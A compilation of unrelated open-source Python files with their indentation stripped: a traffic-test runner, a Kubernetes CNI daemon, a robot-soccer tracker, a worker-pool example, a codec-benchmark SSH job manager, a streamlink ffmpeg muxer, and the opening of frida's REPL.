, 'ev_sockstats.json')
try:
with open(ev_sockstats_json_file) as f:
stats_j = json.load(f)
if zone_dir.endswith('-client'):
ev_sockstats_client_list.append (stats_j)
if zone_dir.endswith('-server'):
ev_sockstats_server_list.append (stats_j)
except:
ev_sockstats_client_list = []
ev_sockstats_server_list = []
break
if ev_sockstats_client_list:
ev_sockstats = ev_sockstats_client_list.pop()
while ev_sockstats_client_list:
next_ev_sockstats = ev_sockstats_client_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_client.json'), 'w') as f:
json.dump(ev_sockstats, f)
if ev_sockstats_server_list:
ev_sockstats = ev_sockstats_server_list.pop()
while ev_sockstats_server_list:
next_ev_sockstats = ev_sockstats_server_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_server.json'), 'w') as f:
json.dump(ev_sockstats, f)
def get_arguments ():
arg_parser = argparse.ArgumentParser(description = 'test commands')
subparsers = arg_parser.add_subparsers(dest='cmd_name'
,help='sub-command help')
cps_parser = subparsers.add_parser('cps', help='cps help')
add_traffic_params(cps_parser)
add_cps_params (cps_parser)
bw_parser = subparsers.add_parser('bw', help='bw help')
add_traffic_params(bw_parser)
add_bw_params (bw_parser)
mcert_parser = subparsers.add_parser('mcert', help='mcert help')
add_traffic_params(mcert_parser)
add_mcert_params (mcert_parser)
tproxy_parser = subparsers.add_parser('tproxy', help='tproxy help')
add_proxy_params (tproxy_parser)
add_tproxy_params (tproxy_parser)
stop_parser = subparsers.add_parser('stop', help='stop help')
add_stop_params (stop_parser)
status_parser = subparsers.add_parser('status', help='stop help')
add_status_params (status_parser)
enter_parser = subparsers.add_parser('enter', help='clean help')
add_enter_params (enter_parser)
exit_parser = subparsers.add_parser('exit', help='clean help')
add_exit_params (exit_parser)
cmd_args = arg_parser.parse_args()
return cmd_args
if __name__ == '__main__':
try:
cmd_args = get_arguments ()
except Exception as er:
print er
sys.exit(1)
host_file = os.path.join (cmd_args.host_rundir, 'sys/host')
try:
with open(host_file) as f:
host_info = json.load(f)
except Exception as er:
print er
sys.exit(1)
if cmd_args.cmd_name in ['cps', 'bw', 'tproxy', 'mcert']:
cmd_args.result_dir_container = os.path.join(cmd_args.target_rundir, 'traffic', cmd_args.runtag, 'result')
if cmd_args.cmd_name in ['cps', 'bw', 'mcert']:
cmd_args.na_iface_container = host_info['net_iface_map'][cmd_args.na_iface]
cmd_args.nb_iface_container = host_info['net_iface_map'][cmd_args.nb_iface]
cmd_args.cps = cmd_args.cps / cmd_args.zones
cmd_args.max_active = cmd_args.max_active / cmd_args.zones
cmd_args.max_pipeline = cmd_args.max_pipeline / cmd_args.zones
supported_cipher_names = map(lambda x : x['cipher_name']
, supported_ciphers)
if cmd_args.cmd_name == 'cipher':
selected_ciphers = map(lambda x : x.strip(), cmd_args.cipher.split(':'))
for ciph in selected_ciphers:
if ciph not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + ciph)
elif cmd_args.cmd_name == 'cps':
if cmd_args.cipher not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + cmd_args.cipher)
elif cmd_args.cmd_name in ['tproxy']:
cmd_args.ta_iface_container = host_info['net_iface_map'][cmd_args.ta_iface]
cmd_args.tb_iface_container = host_info['net_iface_map'][cmd_args.tb_iface]
if cmd_args.cmd_name == 'cps':
traffic_s = process_cps_template(cmd_args)
elif cmd_args.cmd_name == 'bw':
traffic_s = process_bw_template(cmd_args)
elif cmd_args.cmd_name == 'tproxy':
traffic_s = process_tproxy_template(cmd_args)
elif cmd_args.cmd_name == 'mcert':
traffic_s = process_mcert_template(cmd_args)
cfg_dir, result_dir = start_traffic(host_info, cmd_args, traffic_s)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except Exception as er:
print er
sys.exit(1)
devnull = open(os.devnull, 'w')
while True:
time.sleep (2)
subprocess.call(['rsync', '-av', '--delete'
, cfg_dir.rstrip('/')
, '/var/www/html/tmp']
, stdout=devnull, stderr=devnull)
if not is_traffic (cmd_args):
sys.exit(0)
if cmd_args.cmd_name == 'cps':
process_cps_stats (result_dir)
elif cmd_args.cmd_name == 'bw':
process_bw_stats (result_dir)
elif cmd_args.cmd_name == 'tproxy':
process_tproxy_stats (result_dir);
elif cmd_args.cmd_name == 'mcert':
process_mcert_stats (result_dir);
elif cmd_args.cmd_name == 'stop':
stop_traffic (host_info, cmd_args)
elif cmd_args.cmd_name == 'status':
show_traffic (host_info, cmd_args)
elif cmd_args.cmd_name == 'enter':
start_containers (host_info, cmd_args)
elif cmd_args.cmd_name == 'exit':
stop_containers (host_info, cmd_args)
|
service.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_bool
import multiprocessing
import os
from six.moves import http_client as httplib
import socket
import sys
import threading
import time
import cotyledon
import flask
from pyroute2.ipdb import transactional
import os_vif
from os_vif.objects import base
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr_kubernetes import clients
from kuryr_kubernetes.cni import handlers as h_cni
from kuryr_kubernetes.cni import health
from kuryr_kubernetes.cni.plugins import k8s_cni_registry
from kuryr_kubernetes.cni import utils as cni_utils
from kuryr_kubernetes import config
from kuryr_kubernetes import constants as k_const
from kuryr_kubernetes import exceptions
from kuryr_kubernetes import objects
from kuryr_kubernetes import utils
from kuryr_kubernetes import watcher as k_watcher
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
HEALTH_CHECKER_DELAY = 5
class DaemonServer(object):
def __init__(self, plugin, healthy):
self.ctx = None
self.plugin = plugin
self.healthy = healthy
self.failure_count = multiprocessing.Value('i', 0)
self.application = flask.Flask('kuryr-daemon')
self.application.add_url_rule(
'/addNetwork', methods=['POST'], view_func=self.add)
self.application.add_url_rule(
'/delNetwork', methods=['POST'], view_func=self.delete)
self.headers = {'ContentType': 'application/json',
'Connection': 'close'}
def _prepare_request(self):
params = cni_utils.CNIParameters(flask.request.get_json())
LOG.debug('Received %s request. CNI Params: %s',
params.CNI_COMMAND, params)
return params
def add(self):
try:
params = self._prepare_request()
except Exception:
self._check_failure()
LOG.exception('Exception when reading CNI params.')
return '', httplib.BAD_REQUEST, self.headers
try:
vif = self.plugin.add(params)
data = jsonutils.dumps(vif.obj_to_primitive())
except exceptions.ResourceNotReady as e:
self._check_failure()
LOG.error("Timed out waiting for requested pod to appear in "
"registry: %s.", e)
return '', httplib.GATEWAY_TIMEOUT, self.headers
except Exception:
self._check_failure()
LOG.exception('Error when processing addNetwork request. CNI '
'Params: %s', params)
return '', httplib.INTERNAL_SERVER_ERROR, self.headers
return data, httplib.ACCEPTED, self.headers
def delete(self):
try:
params = self._prepare_request()
except Exception:
LOG.exception('Exception when reading CNI params.')
return '', httplib.BAD_REQUEST, self.headers
try:
self.plugin.delete(params)
except exceptions.ResourceNotReady as e:
# NOTE(dulek): It's better to ignore this error - most of the time
# it will happen when pod is long gone and kubelet
# overzealously tries to delete it from the network.
# We cannot really do anything without VIF annotation,
# so let's just tell kubelet to move along.
LOG.warning("Timed out waiting for requested pod to appear in "
"registry: %s. Ignoring.", e)
return '', httplib.NO_CONTENT, self.headers
except Exception:
LOG.exception('Error when processing delNetwork request. CNI '
'Params: %s.', params)
return '', httplib.INTERNAL_SERVER_ERROR, self.headers
return '', httplib.NO_CONTENT, self.headers
def run(self):
server_pair = CONF.cni_daemon.bind_address
LOG.info('Starting server on %s.', server_pair)
try:
address, port = server_pair.split(':')
port = int(port)
except ValueError:
LOG.exception('Cannot start server on %s.', server_pair)
raise
try:
self.application.run(address, port,
processes=CONF.cni_daemon.worker_num)
except Exception:
LOG.exception('Failed to start kuryr-daemon.')
raise
def _check_failure(self):
with self.failure_count.get_lock():
if self.failure_count.value < CONF.cni_daemon.cni_failures_count:
self.failure_count.value += 1
else:
with self.healthy.get_lock():
LOG.debug("Reporting maximun CNI ADD failures reached.")
self.healthy.value = False
class CNIDaemonServerService(cotyledon.Service):
name = "server"
def __init__(self, worker_id, registry, healthy):
super(CNIDaemonServerService, self).__init__(worker_id)
self.run_queue_reading = False
self.registry = registry
self.healthy = healthy
self.plugin = k8s_cni_registry.K8sCNIRegistryPlugin(registry,
self.healthy)
self.server = DaemonServer(self.plugin, self.healthy)
def run(self):
# NOTE(dulek): We might do a *lot* of pyroute2 operations, let's
# make the pyroute2 timeout configurable to make sure
# kernel will have chance to catch up.
transactional.SYNC_TIMEOUT = CONF.cni_daemon.pyroute2_timeout
# Run HTTP server
self.server.run()
class CNIDaemonWatcherService(cotyledon.Service):
name = "watcher"
def __init__(self, worker_id, registry, healthy):
super(CNIDaemonWatcherService, self).__init__(worker_id)
self.pipeline = None
self.watcher = None
self.health_thread = None
self.registry = registry
self.healthy = healthy
def _get_nodename(self):
# NOTE(dulek): At first try to get it using environment variable,
# otherwise assume hostname is the nodename.
try:
nodename = os.environ['KUBERNETES_NODE_NAME']
except KeyError:
nodename = socket.gethostname()
return nodename
def run(self):
self.pipeline = h_cni.CNIPipeline()
self.pipeline.register(h_cni.CallbackHandler(self.on_done,
self.on_deleted))
self.watcher = k_watcher.Watcher(self.pipeline)
self.watcher.add(
"%(base)s/pods?fieldSelector=spec.nodeName=%(node_name)s" % {
'base': k_const.K8S_API_BASE,
'node_name': self._get_nodename()})
self.is_running = True
self.health_thread = threading.Thread(
target=self._start_watcher_health_checker)
self.health_thread.start()
self.watcher.start()
def _start_watcher_health_checker(self):
while self.is_running:
if not self.watcher.is_healthy():
LOG.debug("Reporting watcher not healthy.")
with self.healthy.get_lock():
self.healthy.value = False
time.sleep(HEALTH_CHECKER_DELAY)
def on_done(self, pod, vif):
pod_name = utils.get_pod_unique_name(pod)
vif_dict = vif.obj_to_primitive()
# NOTE(dulek): We need a lock when modifying shared self.registry dict
# to prevent race conditions with other processes/threads.
with lockutils.lock(pod_name, external=True):
if pod_name not in self.registry:
self.registry[pod_name] = {'pod': pod, 'vif': vif_dict,
'containerid': None}
else:
# NOTE(dulek): Only update vif if its status changed, we don't
# need to care about other changes now.
old_vif = base.VersionedObject.obj_from_primitive(
self.registry[pod_name]['vif'])
if old_vif.active != vif.active:
pod_dict = self.registry[pod_name]
pod_dict['vif'] = vif_dict
self.registry[pod_name] = pod_dict
def on_deleted(self, pod):
pod_name = utils.get_pod_unique_name(pod)
try:
if pod_name in self.registry:
# NOTE(dulek): del on dict is atomic as long as we use standard
# types as keys. This is the case, so we don't
# need to lock here.
del self.registry[pod_name]
except KeyError:
# This means someone else removed it. It's odd but safe to ignore.
pass
def terminate(self):
self.is_running = False
if self.health_thread:
self.health_thread.join()
if self.watcher:
self.watcher.stop()
class CNIDaemonHealthServerService(cotyledon.Service):
name = "health"
def __init__(self, worker_id, healthy):
super(CNIDaemonHealthServerService, self).__init__(worker_id)
self.health_server = health.CNIHealthServer(healthy)
def run(self):
self.health_server.run()
class CNIDaemonServiceManager(cotyledon.ServiceManager):
def __init__(self):
super(CNIDaemonServiceManager, self).__init__()
# TODO(dulek): Use cotyledon.oslo_config_glue to support conf reload.
# TODO(vikasc): Should be done using dynamically loadable OVO types
# plugin.
objects.register_locally_defined_vifs()
os_vif.initialize()
clients.setup_kubernetes_client()
self.manager = multiprocessing.Manager()
registry = self.manager.dict() # For Watcher->Server communication.
healthy = multiprocessing.Value(c_bool, True)
self.add(CNIDaemonWatcherService, workers=1, args=(registry, healthy,))
self.add(CNIDaemonServerService, workers=1, args=(registry, healthy,))
self.add(CNIDaemonHealthServerService, workers=1, args=(healthy,))
self.register_hooks(on_terminate=self.terminate)
def run(self):
super(CNIDaemonServiceManager, self).run()
def terminate(self):
self.manager.shutdown()
def start():
config.init(sys.argv[1:])
config.setup_logging()
CNIDaemonServiceManager().run()
|
tracker.py
|
import logging
import threading
import time
from typing import Union
import numpy as np
from tracker.filters.robot_kalman_filter import RobotFilter
from tracker.multiballservice import MultiBallService
from tracker.vision.vision_receiver import VisionReceiver
from tracker.constants import TrackerConst
from tracker.track_frame import TrackFrame, Robot, Ball
logging.basicConfig(level=logging.INFO, format='%(message)s')
class Tracker:
TRACKER_ADDRESS = TrackerConst.TRACKER_ADDRESS
MAX_BALL_ON_FIELD = TrackerConst.MAX_BALL_ON_FIELD
MAX_ROBOT_PER_TEAM = TrackerConst.MAX_ROBOT_PER_TEAM
STATE_PREDICTION_TIME = TrackerConst.STATE_PREDICTION_TIME
MAX_UNDETECTED_DELAY = TrackerConst.MAX_UNDETECTED_DELAY
def __init__(self, vision_address):
self.logger = logging.getLogger('Tracker')
self.thread_terminate = threading.Event()
self._thread = threading.Thread(target=self.tracker_main_loop)
self.last_sending_time = time.time()
self.vision_receiver = VisionReceiver(vision_address)
self.logger.info('VisionReceiver created. ({}:{})'.format(*vision_address))
self._blue_team = [RobotFilter() for _ in range(Tracker.MAX_ROBOT_PER_TEAM)]
self._yellow_team = [RobotFilter() for _ in range(Tracker.MAX_ROBOT_PER_TEAM)]
self._balls = MultiBallService(Tracker.MAX_BALL_ON_FIELD)
self._current_timestamp = None
@property
def is_running(self):
return self._thread.is_alive()
@property
def current_timestamp(self):
return self._current_timestamp
def start(self):
self.vision_receiver.start()
self._thread.start()
def tracker_main_loop(self):
while not self.thread_terminate.is_set():
detection_frame = self.vision_receiver.get()
self._current_timestamp = detection_frame.t_capture
for robot_obs in detection_frame.robots_blue:
obs_state = np.array([robot_obs.x, robot_obs.y, robot_obs.orientation])
self._blue_team[robot_obs.robot_id].update(obs_state, detection_frame.t_capture)
self._blue_team[robot_obs.robot_id].predict(Tracker.STATE_PREDICTION_TIME)
for robot_obs in detection_frame.robots_yellow:
obs_state = np.array([robot_obs.x, robot_obs.y, robot_obs.orientation])
self._yellow_team[robot_obs.robot_id].update(obs_state, detection_frame.t_capture)
self._yellow_team[robot_obs.robot_id].predict(Tracker.STATE_PREDICTION_TIME)
for ball_obs in detection_frame.balls:
self._balls.update_with_observation(ball_obs, detection_frame.t_capture)
self.remove_undetected_robot()
def remove_undetected_robot(self):
for robot in self._yellow_team + self._blue_team:
if robot.last_t_capture + Tracker.MAX_UNDETECTED_DELAY < self.current_timestamp:
robot.is_active = False
@property
def track_frame(self) -> TrackFrame:
track_fields = dict()
track_fields['timestamp'] = self.current_timestamp
track_fields['robots_blue'] = self.blue_team
track_fields['robots_yellow'] = self.yellow_team
track_fields['balls'] = self.balls
return TrackFrame(**track_fields)
@property
def balls(self) -> Ball:
return Tracker.format_list(self._balls, Ball)
@property
def blue_team(self) -> Robot:
return Tracker.format_list(self._blue_team, Robot)
@property
def yellow_team(self) -> Robot:
return Tracker.format_list(self._yellow_team, Robot)
@staticmethod
def format_list(entities: list, entity_format: Union[Robot, Ball]):
format_list = []
for entity_id, entity in enumerate(entities):
if entity.is_active:
fields = dict()
fields['pose'] = tuple(entity.pose)
fields['velocity'] = tuple(entity.velocity)
fields['id'] = entity_id
format_list.append(entity_format(**fields))
return format_list
def stop(self):
self.thread_terminate.set()
self._thread.join()
self.thread_terminate.clear()
|
ex_workers.py
|
#
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
import time
import random
from multiprocess import current_process as currentProcess, Process, freeze_support as freezeSupport
from multiprocess import Queue
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(currentProcess()._name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
list(map(task_queue.put, TASKS1))
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print('Unordered results:')
for i in range(len(TASKS1)):
print('\t', done_queue.get())
# Add more tasks using `put()` instead of `putMany()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
print('\t', done_queue.get())
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freezeSupport()
test()
|
sshslot.py
|
from utility import *
import subprocess
import sys
import os
import threading
import time
ssh_privkey_file = os.getenv("SSH_PRIVKEY_FILE", "daala.pem")
binaries = {
'daala':['examples/encoder_example','examples/dump_video'],
'x264': ['x264'],
'x264-rt': ['x264'],
'x265': ['build/linux/x265'],
'x265-rt': ['build/linux/x265'],
'xvc': ['build/app/xvcenc', 'build/app/xvcdec'],
'vp8': ['vpxenc','vpxdec'],
'vp9': ['vpxenc','vpxdec'],
'vp9-rt': ['vpxenc','vpxdec'],
'vp10': ['vpxenc','vpxdec'],
'vp10-rt': ['vpxenc','vpxdec'],
'av1': ['aomenc','aomdec'],
'av1-rt': ['aomenc','aomdec'],
'av2-ai': ['aomenc','aomdec'],
'av2-ra': ['aomenc','aomdec'],
'av2-ra-st': ['aomenc','aomdec'],
'av2-ld': ['aomenc','aomdec'],
'av2-as': ['aomenc','aomdec'],
'thor': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'thor-rt': ['build/Thorenc','build/Thordec','config_HDB16_high_efficiency.txt','config_LDB_high_efficiency.txt'],
'rav1e': ['target/release/rav1e'],
'svt-av1': ['Bin/Release/SvtAv1EncApp', 'Bin/Release/libSvtAv1Enc.so.0']
}
# Finding files such as `this_(that)` requires `'` be placed on both
# sides of the quote so the `()` are both captured. Files such as
# `du_Parterre_d'Eau` must be converted into
#`'du_Parterre_d'"'"'Eau'
# ^^^ Required to make sure the `'` is captured.
def shellquote(s):
return "'" + s.replace("'", "'\"'\"'") + "'"
class Machine:
def __init__(self,host,user='ec2-user',cores=18,work_root='/home/ec2-user',port=22,media_path='/mnt/media'):
self.host = host
self.user = user
self.cores = cores
self.work_root = work_root
self.port = str(port)
self.media_path = media_path
self.log = None
self.slots = []
def rsync(self, local, remote):
return subprocess.call(['rsync', '-r', '-e', "ssh -i "+ssh_privkey_file+" -o StrictHostKeyChecking=no -p "+str(self.port), local, self.user + '@' + self.host + ':' + remote])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.port,'-o',' StrictHostKeyChecking=no',
self.user+'@'+self.host,
command.encode("utf-8")])
def get_slots(self):
slots = []
#by doing the machines in the inner loop,
#we end up with heavy jobs split across machines better
for i in range(0,self.cores):
slots.append(Slot(self, i, self.log))
self.slots = slots
return slots
def get_name(self):
return self.host
class SlotProcess:
def __init__(self, log):
self.p = None
self.can_kill = threading.Event()
self.log = log
def kill(self):
# wait until there is actually a process to kill
success = self.can_kill.wait(20)
if not success:
rd_print(self.log,"Waited too long for process to kill.")
if self.p:
rd_print(self.log,"Will try to kill anyway.")
else:
rd_print(self.log,"Aborting kill.")
return
try:
self.p.kill()
except Exception as e:
rd_print(self.log,"Couldn't cancel work item",e)
def communicate(self):
return self.p.communicate()
def shell(self, args):
self.p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.can_kill.set()
#the job slots we can fill
class Slot:
def __init__(self, machine, num, log):
self.machine = machine
self.work_root = machine.work_root + '/slot' + str(num)
self.p = None
self.busy = False
self.work = None
self.log = log
self.can_kill = None
def gather(self):
return self.p.communicate()
def start_work(self, work):
self.work = work
work.slot = self
self.p = SlotProcess(self.log)
work_thread = threading.Thread(target=self.execute)
work_thread.daemon = True
self.busy = True
work_thread.start()
def clear_work(self):
if self.work:
self.work.slot = None
self.work = None
def execute(self):
try:
self.work.execute()
except Exception as e:
rd_print(self.log, e)
self.work.failed = True
self.busy = False
def setup(self,codec,bindir):
time.sleep(1)
try:
self.check_shell('mkdir -p '+shellquote(self.work_root))
time.sleep(1)
self.check_shell('rm -f '+shellquote(self.work_root)+'/*.y4m '+shellquote(self.work_root)+'/*.ivf')
time.sleep(1)
except subprocess.CalledProcessError as e:
rd_print(self.log,e.output)
rd_print(self.log,'Couldn\'t connect to machine '+self.machine.host)
raise RuntimeError('This is a bug with AWCY. Likely this machine has gone unreachable.')
if self.machine.rsync('./',self.work_root+'/rd_tool/') != 0:
rd_print(self.log,'Couldn\'t set up machine '+self.machine.host)
raise RuntimeError('Couldn\'t copy tools to machine (out of disk space?)')
time.sleep(1)
self.check_shell('rm -rf '+shellquote(self.work_root+'/'+codec))
for binary in binaries[codec]:
time.sleep(1)
self.check_shell('mkdir -p '+shellquote(self.work_root+'/'+codec+'/'+os.path.dirname(binary)));
time.sleep(1)
if self.machine.rsync(bindir+'/'+binary,self.work_root+'/'+codec+'/'+binary) != 0:
rd_print(self.log,'Couldn\'t upload codec binary '+binary+'to '+self.machine.host)
raise RuntimeError('Couldn\'t upload codec binary')
def start_shell(self, command):
self.p.shell(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no', self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
def kill(self):
kill_thread = threading.Thread(target=self.p.kill)
kill_thread.daemon = True
kill_thread.start()
def get_file(self, remote, local):
return subprocess.call(['scp','-T','-i',ssh_privkey_file,'-P',self.machine.port,self.machine.user+'@'+self.machine.host+':'+shellquote(remote),local])
def check_shell(self, command):
return subprocess.check_output(['ssh','-i',ssh_privkey_file,'-p',self.machine.port,'-o',' StrictHostKeyChecking=no',
self.machine.user+'@'+self.machine.host,
command.encode("utf-8")])
|
ffmpegmux.py
|
import os
import random
import threading
import subprocess
import sys
from streamlink import StreamError
from streamlink.stream import Stream
from streamlink.stream.stream import StreamIO
from streamlink.utils import NamedPipe
from streamlink.compat import devnull, which
import logging
log = logging.getLogger(__name__)
class MuxedStream(Stream):
__shortname__ = "muxed-stream"
def __init__(self, session, *substreams, **options):
super(MuxedStream, self).__init__(session)
self.substreams = substreams
self.subtitles = options.pop("subtitles", {})
self.options = options
def open(self):
fds = []
metadata = self.options.get("metadata", {})
maps = self.options.get("maps", [])
# only update the maps values if they haven't been set
update_maps = not maps
for i, substream in enumerate(self.substreams):
log.debug("Opening {0} substream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
for i, subtitle in enumerate(self.subtitles.items()):
language, substream = subtitle
log.debug("Opening {0} subtitle stream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
metadata["s:s:{0}".format(i)] = ["language={0}".format(language)]
self.options["metadata"] = metadata
self.options["maps"] = maps
return FFMPEGMuxer(self.session, *fds, **self.options).open()
@classmethod
def is_usable(cls, session):
return FFMPEGMuxer.is_usable(session)
class FFMPEGMuxer(StreamIO):
__commands__ = ['ffmpeg', 'ffmpeg.exe', 'avconv', 'avconv.exe']
@staticmethod
def copy_to_pipe(self, stream, pipe):
log.debug("Starting copy to pipe: {0}".format(pipe.path))
pipe.open("wb")
while not stream.closed:
try:
data = stream.read(8192)
if len(data):
pipe.write(data)
else:
break
except IOError:
log.error("Pipe copy aborted: {0}".format(pipe.path))
return
try:
pipe.close()
except IOError: # might fail closing, but that should be ok for the pipe
pass
log.debug("Pipe copy complete: {0}".format(pipe.path))
def __init__(self, session, *streams, **options):
if not self.is_usable(session):
raise StreamError("cannot use FFMPEG")
self.session = session
self.process = None
log = logging.getLogger("streamlink.stream.mp4mux-ffmpeg")
self.streams = streams
self.pipes = [NamedPipe("ffmpeg-{0}-{1}".format(os.getpid(), random.randint(0, 1000))) for _ in self.streams]
self.pipe_threads = [threading.Thread(target=self.copy_to_pipe, args=(self, stream, np))
for stream, np in
zip(self.streams, self.pipes)]
ofmt = options.pop("format", "matroska")
outpath = options.pop("outpath", "pipe:1")
videocodec = session.options.get("ffmpeg-video-transcode") or options.pop("vcodec", "copy")
audiocodec = session.options.get("ffmpeg-audio-transcode") or options.pop("acodec", "copy")
metadata = options.pop("metadata", {})
maps = options.pop("maps", [])
copyts = options.pop("copyts", False)
self._cmd = [self.command(session), '-nostats', '-y']
for np in self.pipes:
self._cmd.extend(["-i", np.path])
self._cmd.extend(['-c:v', videocodec])
self._cmd.extend(['-c:a', audiocodec])
for m in maps:
self._cmd.extend(["-map", str(m)])
if copyts:
self._cmd.extend(["-copyts"])
for stream, data in metadata.items():
for datum in data:
self._cmd.extend(["-metadata:{0}".format(stream), datum])
self._cmd.extend(['-f', ofmt, outpath])
log.debug("ffmpeg command: {0}".format(' '.join(self._cmd)))
self.close_errorlog = False
if session.options.get("ffmpeg-verbose"):
self.errorlog = sys.stderr
elif session.options.get("ffmpeg-verbose-path"):
self.errorlog = open(session.options.get("ffmpeg-verbose-path"), "w")
self.close_errorlog = True
else:
self.errorlog = devnull()
def open(self):
for t in self.pipe_threads:
t.daemon = True
t.start()
self.process = subprocess.Popen(self._cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=self.errorlog)
return self
@classmethod
def is_usable(cls, session):
return cls.command(session) is not None
@classmethod
def command(cls, session):
command = []
if session.options.get("ffmpeg-ffmpeg"):
command.append(session.options.get("ffmpeg-ffmpeg"))
for cmd in command or cls.__commands__:
if which(cmd):
return cmd
def read(self, size=-1):
data = self.process.stdout.read(size)
return data
def close(self):
log.debug("Closing ffmpeg thread")
if self.process:
# kill ffmpeg
self.process.kill()
self.process.stdout.close()
# close the streams
for stream in self.streams:
if hasattr(stream, "close"):
stream.close()
log.debug("Closed all the substreams")
if self.close_errorlog:
self.errorlog.close()
self.errorlog = None
|
repl.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import os
import signal
import string
import threading
def main():
import codecs
import hashlib
import json
import os
import platform
import re
import sys
try:
from urllib.request import build_opener
except:
from urllib2 import build_opener
from colorama import Fore, Style
import frida
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.completion import Completion, Completer
from prompt_toolkit.lexers import PygmentsLexer
from prompt_toolkit.styles import Style as PromptToolkitStyle
from pygments.lexers.javascript import JavascriptLexer
from pygments.token import Token
from frida_tools.application import ConsoleApplication
class REPLApplication(ConsoleApplication):
def __init__(self):
self._script = None
self._ready = threading.Event()
self._stopping = threading.Event()
self._errors = 0
config_dir = self._get_or_create_config_dir()
self._completer = FridaCompleter(self)
self._cli = None
self._last_change_id = 0
self._monitored_files = {}
super(REPLApplication, self).__init__(self._process_input, self._on_stop)
if self._have_terminal and not self._plain_terminal:
style = PromptToolkitStyle([
("completion-menu", "bg:#3d3d3d #ef6456"),
("completion-menu.completion.current", "bg:#ef6456 #3d3d3d"),
])
history = FileHistory(os.path.join(config_dir, 'history'))
self._cli = PromptSession(lexer=PygmentsLexer(JavascriptLexer),
style=style,
history=history,
completer=self._completer,
complete_in_thread=True)
self._dumb_stdin_reader = None
else:
self._cli = None
self._dumb_stdin_reader = DumbStdinReader(valid_until=self._stopping.is_set)
if not self._have_terminal:
self._rpc_complete_server = start_completion_thread(self)
def _add_options(self, parser):
parser.add_option("-l", "--load", help="load SCRIPT", metavar="SCRIPT",
type='string', action='store', dest="user_script", default=None)
parser.add_option("-P", "--parameters", help="parameters as JSON, same as Gadget", metavar="PARAMETERS_JSON",
type='string', action='store', dest="user_parameters", default=None)
parser.add_option("-C", "--cmodule", help="load CMODULE", metavar="CMODULE",
type='string', action='store', dest="user_cmodule", default=None)
parser.add_option("-c", "--codeshare", help="load CODESHARE_URI", metavar="CODESHARE_URI",
type='string', action='store', dest="codeshare_uri", default=None)
parser.add_option("-e", "--eval", help="evaluate CODE", metavar="CODE",
type='string', action='append', dest="eval_items", default=None)
parser.add_option("-q", help="quiet mode (no prompt) and quit after -l and -e",
action='store_true', dest="quiet", default=False)
parser.add_option("--no-pause", help="automatically start main thread after startup",
action='store_true', dest="no_pause", default=False)
parser.add_option("-o", "--output", help="output to log file", dest="logfile", default=None)
parser.add_option("--exit-on-error", help="exit with code 1 after encountering any exception in the SCRIPT",
action='store_true', dest="exit_on_error", default=False)
def _initialize(self, parser, options, args):
if options.user_script is not None:
self._user_script = os.path.abspath(options.user_script)
with codecs.open(self._user_script, 'rb', 'utf-8') as f:
pass
else:
self._user_script = None
if options.user_parameters is not None:
try:
params = json.loads(options.user_parameters)
except Exception as e:
raise ValueError("failed to parse parameters argument as JSON: {}".format(e))
if not isinstance(params, dict):
raise ValueError("failed to parse parameters argument as JSON: not an object")
self._user_parameters = params
else:
self._user_parameters = {}
if options.user_cmodule is not None:
self._user_cmodule = os.path.abspath(options.user_cmodule)
with codecs.open(self._user_cmodule, 'rb', 'utf-8') as f:
pass
else:
self._user_cmodule = None
self._codeshare_uri = options.codeshare_uri
self._codeshare_script = None
self._pending_eval = options.eval_items
self._quiet = options.quiet
self._no_pause = options.no_pause
self._exit_on_error = options.exit_on_error
if options.logfile is not None:
self._logfile = codecs.open(options.logfile, 'w', 'utf-8')
else:
self._logfile = None
def _log(self, level, text):
ConsoleApplication._log(self, level, text)
if self._logfile is not None:
self._logfile.write(text + "\n")
def _usage(self):
return "usage: %prog [options] target"
